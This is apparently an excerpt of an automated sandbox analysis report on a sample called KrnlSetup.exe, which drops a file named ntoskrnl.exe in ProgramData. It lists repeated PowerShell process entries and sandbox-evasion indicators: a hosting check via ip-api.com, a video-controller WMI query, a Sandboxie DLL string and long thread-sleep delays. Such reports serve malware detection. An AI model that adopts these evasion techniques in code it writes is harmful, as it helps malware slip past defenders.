                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exe    Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: global traffic    HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe    WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: SBIEDLL.DLL
                                    Source: KrnlSetup.exe, ntoskrnl.exe.0.drBinary or memory string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
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMemory allocated: 1A4C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 820000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A340000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 520000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A620000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 600000
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599891
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599781
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599672
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599562
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599452
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599344
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599234
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599125
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 599015
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598906
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598756
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598638
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598511
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598385
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598266
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 598141
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597990
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597859
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597750
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597641
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597531
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597422
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597313
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597188
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 597078
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596969
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596844
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596735
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596610
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596485
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596360
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596235
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 596110
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595964
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595781
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595656
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595523
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595406
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Thread delayed: delay time: 595296
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Window / User API: threadDelayed 3219
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Window / User API: threadDelayed 6594
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5914
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3919
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6693
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2955
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8172
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1446
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8124
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1444
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -34126476536362649s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -600000s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599891s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599781s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599672s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599562s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599452s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599344s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599234s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599125s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -599015s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598906s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598756s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598638s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598511s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598385s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598266s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -598141s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597990s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597859s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597750s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597641s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597531s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597422s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597313s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597188s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -597078s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596969s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596844s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596735s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596610s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596485s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596360s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596235s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -596110s >= -30000s
